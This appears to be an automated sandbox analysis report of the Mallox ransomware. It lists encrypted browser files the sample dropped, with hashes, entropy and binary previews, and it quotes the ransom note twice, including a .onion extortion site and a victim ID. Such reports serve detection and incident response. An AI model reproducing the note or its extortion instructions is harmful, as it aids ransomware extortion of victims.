                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):196716
                    Entropy (8bit):7.999114051651172
                    Encrypted:true
                    SSDEEP:3072:2mp2Uu3WoDHtya9KswiMee0/v+NvF0+PGJJoRjgsmQANi47lbjtChQaXEosNCTv:2mp2vmGHt/3w0F/vxJScdRCKafz
                    MD5:92EC9ADA46A31ABFD7D04DF7C689AF9A
                    SHA1:87EFA84E403A19E7D0E0798AE32F0359AEB56400
                    SHA-256:28B3F8420A0B77BC4BE01B94403C5EC7237E19DAE6E0A2FC1394E82947D14732
                    SHA-512:F8961C9C7F07B27BAC863D3B53E1D4A58E678FB03F67DEE7037E7B91216AAF04DDDE649260E572AC61697F2970E9ED3FC3D30F77CF3004F42D54B866B8C2858F
                    Malicious:true
                    Preview:..g.N.]P|..ou.[........}s.....I.._...Lk...F.zK5..$[..h..eK.)....z.{RC.X4J..V2.<H... ..O7.(......Z.JX.@....:.Y...R5.?.rOJ....`=.UQaa....N..w.6.Ub...\.w_./..q.c.%....4.&...NU.....y..]P.@...F...z<...\....5f.Z.H.IdC..}.e..v.m...P.........6xS.<c....C+.e....ic."..1..j.&.0.O.Rm...p..F%..0L..^.^w.....N.......%...k..X.......>\......9.M!L...&.'..|...'(C.2..0a./eM.Mp.|upP.uY.Z....(.--.=.".!8Q.(.W.x.?...A...r..)..9.e..1e=.G..X..+.A.@..;.m...~...kv.g'c...j.%.F.jZ2.<..u.K...1.)q....g.../.....a...u...L...:Mo.l/..~ ....)H....&..'...Z;?..K..lu.%......N.L.....T?....c.zh.=......lR.".'J..$l=.v3.=.M.~ .x.......'|D.~.u....O.h....R(6..2..0..5...j.g..I.D.#aw...[.&.#.B..N...W.RV.&..@{.6...@p34..|.....(..q..m.`y..c.4...B.c.!.......S....'....q.4xkE.......n.Q.[...W.N....Un.dn..K<.|N.0..TWP{.ct+.....!..o.Z.#.=.6.M_o.D,.....|.kvnm..f..2yl<...mY8.....5.}.....j.6...9O.c#.h..P....B-Wm...4)..i...=..`].%Q....L..v..<.l........Nk...NnY....F..O.Rv..M<[.@....b.....A)q.Ts....~..}e.+2

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):14444
                    Entropy (8bit):7.987536772013654
                    Encrypted:false
                    SSDEEP:384:fts5xlL5rSLAs319N8Dlfm16QwPM57YhgF3ShAwoXN:ftSLZSLAu1vM+1xwkWbGwgN
                    MD5:C70EF82F6888CE9500032274525627D0
                    SHA1:D6ECC811D40793A845CFC658D470D2C83BB08D74
                    SHA-256:CD5B49C00624FB74C4E9BE4F48AA3ECDABBE6803C716EA2A88A2DF379B68B495
                    SHA-512:25A5977BD22CE0B9FA239D8F42816F55734257FD36B8C215871F8BBD1A55AF2026D4F6E0F58AC0BDF7DCC6BD16FE048E43F78FAD2B9D0A9A0AA1EF4B3CF9539B
                    Malicious:false
                    Preview:...S......?.v.._..3.a......._.W...y@.O...5V.-3.0..B.Z.....i..._.W.TG.?...{V...Y.+.o...M.}P.W..,.OO..R8c...oz...6h.....>.3.57...e~H...QDY8....0M...yZ....a..E,...B..q)*n.+.....r.R....zT..G.'..O...yd. ..-./..R.Y.....A......8e.;M=.....N.._.......dd..:..d._z...>...<...(.v.=G...%V.......xAc4\.=hq.w...*...^...q....>.>............p\,..h%3@.......c.+'...u..Hj..I.83....0t.H....b.i..!.QG..]...........U.c..u~Jy.....4.~..&....].m.E....k....6...........}.w7.BP;..........k.M.........h..']..{\.l..m..^.1...7.?$.*......`.~....]Z.\.Q`..7...R...l.D...h15.q".F.....c.0.....r.|.g..C.~>.....fP./^1m.>^...........k.......[.P@<.@.k.7.\tL-.5..zwo!_....h..O....Vw.,..h.~....7O4?Hu..u.Vm.Y..O(.E..d..(3....<.Z.........OVtN$f.....1.q.~# ...j.a.Q..y(.i#[......g.A.....K.q.[.M...;....u..........;..WM.....G=...:..y..<.a.N...n.kl.N...jk.@....5.......o....8.].tm..(;......k.^$..M.....P.z...<..9`LG..oOQgI....N...RR.......9._.._(E...]@.Hm..|.....E.x....8Z......QF.U ..U.!7.m.f6.Y

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11863
                    Entropy (8bit):7.984589109466564
                    Encrypted:false
                    SSDEEP:192:ft8K80+aZUligjZfxsPW/MJsiKDG7kvYNbQ76VifeUhLiR0yZlyPZdoGb3rupIhq:l8K+aZUYgFuMLDxvUQ76OlhOuqTErueq
                    MD5:919BB65289541F0C852154EB1E575290
                    SHA1:00777EAD0D1E348581AE4EAD766B7B11605E1D17
                    SHA-256:CA2BADBE2E1F93BF47D9D53FDAB715E78D2F7375D5BE776863F3B3F2C7567206
                    SHA-512:6272CBA9C91B50C67DAC4B36297CD4627B02F8122A837F1DFD52E2D7F50E011E337D7F91DE595F0E3BA1EE4D571BE6555C63830BBE6A41CB657A7E70053735A9
                    Malicious:false
                    Preview:...X....o...x....ap.Nz.z....xl..e6<....j=>/*@.........$.=&.-....3.....){]....7.-IG.3f...8Y..{.c..R]A...M..TSF^.*..PV...|.`&.#.;.`....s d.....".....H...v.......b..L.F-.K..t.$B...y..>Z.+....e(.f?.s......D..j.u..6$+. ....#..YA.d....Eo..[....f.....}+s..6..._.. .f.%..9.`.MM..uI7.y...X\$.0E]%'.....V#.ON.l..=A.d..u....S..i....V&?.._...9V.......Xzz.....z..U"..V.J.geA.......rh.S...d!.{.......8...eA.;..~.U....I....`R...S..b.g$e... ....%..fw:.,.d]......q..1...*F/.dq.6~...1.0....!..P..Re.).....`..C........x.!.....d...........b~T.....G.pT'.r..sB_g./..=.}.Ti..!.a.p..1..&.Xa..;o..(..v.........c.!....<....i...?...../.J.]./C .......AS..&Z..J.0...2v#.6..%=.p....v....%.TW.&..I{ 6....K....O.J.:............".,i]R.@...9........>t...W.f..V..4....M...x..bk.:....Ye.`....~.d.tI./*`.4.r.B.P?.].(.oO.).....UR....[tq....?9.y|.....l.r...*...8..n.~.[tI~...]Da).s...go......7.....4.0'......0....c}#....nl.....5u...HA.M4/F.?X......$,2.5...B...`D$.L.....0..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\23f3e33e-2909-4846-833d-bc7b9b091dfe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):16492
                    Entropy (8bit):7.988285092099881
                    Encrypted:false
                    SSDEEP:192:km72wrZsClsvge3wbTPzPZA0mf/mXvUcoPwb1zx/Ul84pmSBbxecc0vGp2znvWG:llCbgS8jZ+nkUypx/SpPb1c7ineG
                    MD5:5E55E5F06594FD97CD43B3D4886C6EF8
                    SHA1:8B2A0C78DB1CE317DBB616A0A9D2D5C58F6C7326
                    SHA-256:1AE1EC39154DEA780F1E7A101D2C863B4C4EC624F79473721B045547388F60A6
                    SHA-512:E7735348B0847FC1E91D5DDFEC469D230BA7FD78291364472509894D28B5D61AF56095104660A2A24C093A4A05DFDEE82C6D7EF6EFEF0727D7F911A1019E5DD0
                    Malicious:false
                    Preview:....9.R.v$.#4.......`..?:.Lp.v}F...(.)0..F..*... 4...la..].a.Q$."et...^.g..g.. ..@.w.>.Y.C....I.l......?Y.)...L.K..i.&.Y.R..D..T.H..g.j.(.SZ..B..!.5V!-.....n....4.T..ZD.m.2....\.M..;...jL.....|............_.'E93...KR..]AM.4,...K.`.]{zY-f.y.....|....G;af.>.. .[.zF...k.).tG\:.m...........~.c.bI.5a..3.)P...cKvn..Pf..yS.F.]..pD.k<8.M...:2....P.{.....K....y.RV..+K4Q..8A0j..e.?.....Y..J.......+.7..}....d.Yt..-T.s.W..O........Ou.......ZX.~...Rp.6-m...c._...qD.x....1.....oU{1.w..?.....^./..RIx.R.....d.w..B.s......Q'.B.r....o.o....Y.........z8...B0.v .lki....#.!...L))......v..f. .(..k..%2;...<.@v...v..K.-yc.M........f~...Cw....i*8...zT.....s.X).....j.l...16q...m.........W.f..tw....t<Ay.w$.......)X..1.$.<....g._.$75.N.c(k]Wk....,.E.AAdd.......4..T..Y."...G...\......1g;c..Dp.....@..I....P.....|..lw..g...(R.|.n..<...5SY;..bl...1......P....$...gt.G.......*L.&.R.Ss..9\_6..J..._.V......... ..4....@..C6.).g..D...T..^....6Y(.k.+d...M$..<.... :.0.u../A[...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32876
                    Entropy (8bit):7.993789512665837
                    Encrypted:true
                    SSDEEP:768:W8O79MGwsW+CCopXbCckKEF3Rj6KuOAxDksuXQTAPv9sd8v2SNgCf+bAA6W3x8yZ:fa95WixFx6zOAxmQuv9sd8vL9StVx8yZ
                    MD5:1A1C012DD8582D38F0C32258A83C4937
                    SHA1:A4C643F8DD5BB9C35D7E165ED3FB517B34F2BF0D
                    SHA-256:A9DD75D662FEA029D3386F324DB91E244E81A9EB43EBFA9304CEC962A9DF5E03
                    SHA-512:168CD357A1BDCEF28F8F489A889FCD9CA10FA6FB214CE111037B9E41F0805DD95931725AC9FC62EB08CE5D6343A2C33345E0CFA5590F639A174D7511A1A5AB95
                    Malicious:true
                    Preview:.E..Z@..4..DB..j.......E.j:.oJ.q.e.d.H..G..0.[...S.....Z.".A.sB.(.....N..S..~.2;.............x.^-.L.G...3.....Q3i3..Q..v....5..)....a....:e../X....*.p(...H....!<..<.O.H.'.....6...>..U8.."0|;..F@a..-...k...?..l.x7......*_..#.d.]...oK..G..{..V.gR.j...b....$~.......f......B(`wC.. Gq..4a..p.}...xj.W.v...d7c........Fq....X...~....h..`.(..H..r...YQ..J...G.O.-".o............n.M..~.B...&...G<..D3.4...>t~O.].5$T..`.A......g~fN:N.....Le...Lr.3EN.<d.0l.b..V..Zs.t[........tm.:.......,...<T.......'.M.I.-.Y..|...n.G.`...+|.`..u.!H..yN.....`...y.=..m.S}.{..H...,6.#..\5x.!A......I..~t...6.....G...VZ..#DV.B4...k.ey..^......e..B[{......*....W..c*c.J.!1zp.........m.H.V.....D...8,OI.P...\V.\..l 1;..X..E`&K.]...B[...x..V0i,..9.b3.0.y.5n....B..|..?..CND..1.....5wGn..7A.fs)...*.},..e..Q.......w..#..aW..B.d4',K.t....}..-F...|...'."..W....~...n.u.....r.....k...A.......d.:1.".$$_...&.9O.,..'.n..}....'..._.....?#....bz..?.R.3..T..1..B..r...>..r. .c[:C....e..c.....

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):70180
                    Entropy (8bit):7.997275641920126
                    Encrypted:true
                    SSDEEP:768:PJ3Dz3XKo8ox7I+yKcXNb2AE2eho1I8CP137FJ7aYI44oghIA/73Gawths5turE5:Z64sXcKBy3137FJkagp/73t95AJlP1k
                    MD5:1EB7E33BE73B91FCCFF75172F5A706BF
                    SHA1:FE157F551C00262E03B86D8BAB12E0D4C7B399AF
                    SHA-256:4B20104587F9EBD4CD99DB09DD3BF336417754C3A02D99D7F56AFF0E2AF08425
                    SHA-512:8784BA522AC764D9CB0C098424AC2FA9D031E026112131FC6B0E60AADEABCB5D4967500B8A52AEA847F1FFEE92590F74EBF90D9AFCA3B58F8A38D12BC904C43D
                    Malicious:true
                    Preview:u....r..wsA.....&.....v..HV.......1V....*...]|Hxh.@...MX.G.....3...,GZ.w.. .eu.'...Wa..Z.W.IKu?.v.M..0;4.=-x.I..*...g'.sE.y$.=.]|j..|.!...n.:.#"K(`...b..sr:.^.....l..C.A....-k.<O.0q.ui...`....jV....:.0..0.r...>-..&.qzI.s.<9{...D.g.._...k.Y.l..5j.9..../3.;.......r[t}.yn.?..`....[.b..Z.f.\.^..r.f=..R......]W.-H,..[O....).....|ei<c@..-. ...yim...s.=....%?....~.#+x.....@.).'..G.....hoo...H..j.dA.L.0.5..G....ah...._.u^..[..0....b.U..Qm...ruYq{.N.y.ps<.N.2...JrT...i...tSb.K6....t".q..0C.Q..9...".I-.QfE?M.,..<.3.R&.O.+..(?.... ^./..G.....S....(Xe../.......sl.e.....]a$.sR.[jf._\.}r..v2?...o.^9.......M@.n....."...r.5..Z.6,....2O1P..s%..8nB...4U.$OtUd..V.glS...#.......A.....Y..r.4.dl$..&.h./..T?.[.$.)5..uK.N.................d...W?..>.%1$\%<..9.{.qOpY......@}.....m....<.d.Z.!.c.c|.f.z...........;.:k....2K.....3.}...@.R..^.....k.{..._..n..B.;..i.|.s..i:@.3J.L.Z..]....x...Zj..gk...<...0...Y....".D.....(.(.7n.wHq8si. JF.v.....>..M.c.dJ.i.....nDD..7...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\uu_host_config

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):398421
                    Entropy (8bit):7.999562114157628
                    Encrypted:true
                    SSDEEP:6144:mBifcqCIm3YYW5sHowVZlLDny74T+tLkLgpub8r6EGlBDdIR/kC/337XQhE:mBuIIIY15s3Dn44TOhuY+EGzAV337ghE
                    MD5:6CD912C4AFB3223C43D4693EE224F242
                    SHA1:3B670F242A51D81CDE6FA8E157D5B21DA9303FE6
                    SHA-256:C59378ECD3B952C45F93D6199AD52A7F172A1E9A31A4C73D24AF8E73EFAE43B0
                    SHA-512:9F030BBEA774757E4D0FE0FB2267FDFFDD361412D60FDFD37DD368EF9DA15639C6BA109B8E8DC39841742AA7F5F8D70E68D4D5C0ECB84353F73B802ACF301721
                    Malicious:true
                    Preview:.1.k.X..O;.....c..L.m..>...}..Q.R...Y;&...X..I.BC...?y.....V..%...Bx...T..........H...`.hT..O..CxNi..'....kT......$..UO.@(;......<Bl.....L.............O4...5.=....?O......(..fPNL..h....l...jd.F.[@L...g.....f.4.....@.........4...E...Rt...#....-.kC..rR..t.G._.(.....>..RB.F xf.....M_..[L:}.cM.6sy.,....c4.R...e..&..\.O.O.HSU.%.`./l/.@..g...,...p9f.n.qy..B...'..R..1!...a..?........(.m"7.."..p....z...I%.V...4..g.V....-^...{T.m....6....8:{..../b.........b.|E\.G.bk.~.M.;..;..8_........!.[/MQ.Z-z6f.[....&.3..../...A....[.L.......x['.[.J....?....D.F.3..|.=>........i..Y..G.]o|yo6_$..K^..F...r..|9..H..u.'D.5.tdz_...........^.b`2....,.g^..ux...M.9GK..B....#./)./N0.^)..GT9."...US.....*..."7.P*.O..|.kZ...I...! ;.....c[.b.....UN.ug..=&.MU.j.r..T.P..1!?c....}.L.3-..{a.0........6]....K.jvrK..X=-.'-......X.|vB.7J..^..t..d...C.4.....#Ico...K...._c.L.\.....9........9.4...X..w.s........oo."...t.s./.)^.Vg.6...;.+.S...^/....@..r?.:..S@..U.s.^.C!.r..;...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):80304
                    Entropy (8bit):7.9976793146197895
                    Encrypted:true
                    SSDEEP:1536:501L+Dvre6aEHVQVoZbPA3BAltjwjVrRS31HnPvXQVlCDaWb6DNcfnwV:501+jn4oRPwmMrRe1HPdb3nu
                    MD5:970C7925E404B954C63C37A1C5624C6D
                    SHA1:D5669D23CA9C4C5DDCEE3C1565C4193F7B1A594D
                    SHA-256:1D056C34FA3F87ECC8AD8ED9E7909AC30D0F6A1D2C9667D8610E76F72BA41CE8
                    SHA-512:6113E0EC782C9A8F838EF91CF2FF007F2E27E6ABC10F2379BAA231C936316B44F7016AB63F4F486153BD984A67943D0EF2D90ADF52755E8C1DFD825A971A3C06
                    Malicious:true
                    Preview:...mK.G.HyG\'.Y........!A.d.>.....[]....D..%JfzF.2l1:..l...~.O3=..h.IU.V..H.U.. ...*..OK...9..e.....=...xA}9.....Jl...#Z....e....f..?....J...;o.....}G.g.DG.G..R.m..N.z.$7=@.:...-.N.K.......%]L...[&;......X...^e...Kt.}a....(RP......-+*x....1..KK5..6[.Qw.et:.?&p<S...l....k.x.LM{...p....Iy:..9g.v#,<. ....jm.../+;.:......w....f.}..J..1.G...6.W.~...._.....U|..b.D...a......$k.3..l$Up......=.\".F.3.m.l.L.rb..p..b"QrQ.C.\...!+....c9.D.....(....`.=.+.W..n.3..Z.#...B.W[.tx.:.!...8]..&6C.*.....{.......$q......A.~.....!..T];"2.Y^V.v.>;-..c..P...R..W1CE..[.^2d....f...[4..%....c._. .qn...Kn..g...H..@1.~......x^...m..6d#.=....in.C5.!.O.`..2H..PZ.V..~z..2nY.j.D.&?.m. <Z.D[:D.m.RhQ....P...u.-.."4..(n....._..">..%.E...F...6.O8.#..l..9x.4e,...@aI8Rg...}6W...N..C^.h.0..k......7..?........Q.]....te..h.{.......Ki..' .\:F..&...9/....K.T.K...J..1?....-.....W...x.;..q.T........E.G....(..........|.SIT..X....HG.>sr.}p1.>x..b...!..........0.....u".+...|b..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\InputExtractor.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11675
                    Entropy (8bit):7.9847864410820035
                    Encrypted:false
                    SSDEEP:192:w22hOJTtE9rTmlWZ1ywDW59DpsAz9md70cb6RYqxs3tvA0mhfN:w22hOH2fLvgphIKcb1YN
                    MD5:FB92D362FBA494445E6F81E2A49A68C3
                    SHA1:E3711A64D47B44A4E18685F7B4CCFF5D68124E04
                    SHA-256:09D98434B8E9084F551CA3F3DAC966397B46E4516A1D44620472B9E367B288DD
                    SHA-512:AD63163742973549A07BD94079F5A0CF1DFAFA2C19AD6A890EA27EA4428C5E100CF0F9BA250A509D51DA529A5761DA0EB014160EE1AF4ADDE910DE66571CCB3A
                    Malicious:false
                    Preview:......'anUs.R.G\.jf.....-...v.n...g5_. ..........[.........N}..l.....e..&...,gc.?.lJ%Zt..^..t.MV@.jE2..I..%..y.{."...E..]...........5.......Vk.(.y/.H....:.UN.J.,1.b.:4..........C.._.......Q...KX..N....X.b..!.y.;x......d.$.S.r....2..F...|.-....~......*.z.........]..0.>Hi..`.?"..`..E...IE.[Z@.>#.V.w.&.V.....A%q..O.....S..h.z.5.D@.......(.{..n6.1;..........;.V...}6c..sJ....9..[@#liC.w....}..k..5...I..{...;.........op.<...*`M.+.n.`.!..1...].6.X.94.[ ...{....om4......{.d..&.<J.....h..hZ^...B.i..^......Z.Q....ql|.cKT....Q.!........o|...C1vz6.f....x.?S...t..BKA4...m.5.=.=.@.......aGa:.....2O;m.K.o:^.jr....2.Pm.:K..w...3...rH8.,.Ya..r.9o...a.w..F E..6Y%.7Ww..o..{....A.$`8#....yA.Ux..y.X..dI.r..V0....jk.-.._^._.9M..P......k.R..B.....O:..D .&E.Zf.#..i...ax....y{..|.o..C..#..f..K.."1`.*1.i....D{.3.c.m....._Ng.E..../#..8?p.."`.#X9I+..X.'.8*w... L.<..O.,N.7..?\H.>..C .>:*.[g.{..WC..y...6P.#..O..A0+....6...Z.....QV._'..T.....<....-.G.I..96...A

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1179056
                    Entropy (8bit):7.9998494359037045
                    Encrypted:true
                    SSDEEP:24576:MuYdGSlLqU1vw1l7WE3/Ur/Wwa4HxtUe92dqetCCsNRYLKlk7Amu:MuSGSLKAJreSxBLuCRoAmu
                    MD5:0B0805AAA7518BFDEC2819A03F037A99
                    SHA1:3397A406327D017A8F51044C99F13AF35A642CB6
                    SHA-256:0EC14D992B9B7454F128F7214503BB54D96D2CD8405B7C6BD5E4698166CF0DCA
                    SHA-512:6A7FBB170E07C7540F5AEDF7C856CB041DC1AEA69A3413D675F2B0517866FA69A9B848F4E8D91468FE75F0EE64D3D4BA2B9C9B51BCE4CA8AF96BB41930DF082C
                    Malicious:true
                    Preview:q.....-uW..<...).iB.b.1&..*Y..?\.......x. ...l...t...B....~..r2..'6.Z".%..q.`v..^...."B_..B..=..P..._#.L.?o....f.nN.......\g{.'.3\..]....l.A.{.9....M..u'.t.(..gQ.z....<l....W.....vm{..`..b.|.K.4!=...KP..}.?TcGv@Q..VP$<H...p.B'r1 ._;HQ`%N....SS.....{...x. I...r...r...Z.3..&..9...6.....z...v.in>.MU..".[Y;e.=[.^.P!!.a........&u.j...qv...e.g.........V.......@-g..%......+>:.{1....h.^mK.........C4!...O.HGq.FAK..L{......$|...Y.z.B..>.$._-b.<U...k.n...../M.....^....U...B...<..N.PQJ...9...z.....ulG.jv7/B`/p`.t.v.F....].n?#.|Xb.....\....Y..B............@:.."...oK^w<..T...e..... X..n....m...2../.`.a.S.dX.|S4Q..5..?iE...tc.....S...~..:NH....:..EFwC/{..h.IuG...DR....6.....?:.!z,.bP.:....8.[L.9=...5...., ...:.U.......\.H..L......%.3..X.....r..!./.}.h=Jy.n..!.&.E.../...~....{.,.Q6.[.%.Cm...*Vp..X(.Cz..9!..........ov.=.._m.......`.t.(.<.....!..8.........nR..c.T8.D.:.'V..z.q.........8.;.O...J......b.|.7...Lm..T.|...8_.~...i<..s....G..?..&......

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1010506
                    Entropy (8bit):7.999788334929347
                    Encrypted:true
                    SSDEEP:24576:q6teZuyVYWcK8ODY2pizyQEPsou5nW5yK:OZuijDBkoudW5yK
                    MD5:3D6FE79DA1555938260EC4138C51C426
                    SHA1:44BB2BBA2F7C7056A8190B4C7A2F621CCE9ACF8F
                    SHA-256:867D7AC54078710B53FDE1915CC869FB5B4D07929068180BC6FDA720704713C6
                    SHA-512:BD658741329032F7C4998D0D36E4AE711196A3C2B294AAC5AC7A5814E963DDF9E0B412443F91DA8140DEFFBA18E6132387706334A37C727E9F6871C7A850578A
                    Malicious:true
                    Preview:IL..E`e..n...dN.g.0..ZJ.9..}r"......n.IG...j.g.......s)q..G..g..v..."....Am`...ff?...r.6i...;.3..N)#.(...+"..|.S.........M.l...B..`...D9..o.1.sD.N.......Lg.s*....$1$.QJ.Y<.\..%z..`.....%.o......./....C.r...7..qYa.u.....+..'.3mzd.YC|..Z..k......+.*..`.......'....8..Y.d.~.....9H.Y......{./!x'.!....#..T..+.ej.B......X..S$C......p........m...[\U..!:..1.[9&'C(S./.1...!.u-.-%"'..^m0=.1.eU..q.......b..|.u..CnM....nV=*n..Yp......9.....=.j9.nM..)3......O......M.........p./......,...1.M..E..Z..J.uR.,.....i.R&. %1H...#0]Cm..1.5..v,.$Zr0H-.......4>....z.....D:.Y.C.{.fV.Pe+..T..`.>.....C.T..in.~. VWT:..?. ..&K..).....}..@(.+:...t.>.u<...m.}...wTZ....P7Y..J(..#....~..(n.?.o.$".@..! .Zx....7L..X.....Kx.........K-jhV..Y0.-.K...A...T..@....O}<..S`.Pp%d.c.y...[..B...40...HT.+u(.....}....x.).}.L...8......iD..R.$..~..JEz`.......k@.ADa.'=.X..,.'...t.u.~..Il. ..%....._Y.y...*..f.O.Ew......`{..[..r....!?. ..n..?.....<..Y...T..C............g.."qks...HB....f.y.PD

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1042011
                    Entropy (8bit):7.999847625084633
                    Encrypted:true
                    SSDEEP:24576:WRrAIiJsu6Tic2c2T6NErMpIlfES74oCOHfvkD37Uld:krA4LSSguOkD3w
                    MD5:8B4A0FD3C5742E02B98E3A1D796C726F
                    SHA1:50741D77EE31A01E82B8D4FB8EB56A57BE7E2CDF
                    SHA-256:488BF7141B2EC1C097E4B94BA26EF846D7B5CFFA68ADFE0E2380C057052E2B4A
                    SHA-512:49BC68789E07EA7A5455B966B96ECAFB1AC1605660A22795AE798198F500CEF8376BE4CA7F2F319C436D1F17505CAB2C3C95F415E2CC6342F878A0BCAEAA3069
                    Malicious:true
                    Preview:4......M.G.a...B...b.IN)...^..m..n`.q.....JV.."..$..ud.k...`..yUPc.^.KH+ ..OA...\...u.)..a..b`o.r....@J...fM..I.........@Q...W..{0.S.....+......:........y.\.+_....-...pC.......v....#5...?.@..I/^K.X.3'VSd=j2...........r....y.cX^^...\.i..]...KdZA.nf/...#...}.cO.W.....+BN..~-.].....q.9.j..BwQ..Q.=..>....9%7...*.=....0.....*...|V4.a.....<(C:.......l.e..Z7.R.9$?h......4.n.$.......U.3...2....*......+.VZ.{...^yq.u.6.V....*.-../..]...<..%.......b.^N..n...%.TE\......_....!...k.>H9.._...1&....7....W....'.y...n....\..^.J.+`.aU..R..Pw%!~.....K.%..\~.X...4.I...=.b..J....\>K)a.....s..........e.&.a."........0.e`=u>....{....h%i.....K....<oy....%....e;s.pY.../.$.;u....v.....*Yi+@B-UO>uY%&.w..n..L6.0.5%p.:..G.9B.........c..n.Q~...S.%...1B...y@.(T...{N...(a4by8"...;...f.W$1..[.>j6....w....r...2..A..Da.....9P.j....jx.5p(..m.....:6M.W...b.m.e''..:;.=!.w...R..M.....?.%...N....[..f....9.w..e.T.m...=....Q.;.qg..Ka..2Rr..1.K.tt..?.(6Ev..eV.-YO\aCF}^.[.R.U..(.KY8

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1680823
                    Entropy (8bit):7.999883050406671
                    Encrypted:true
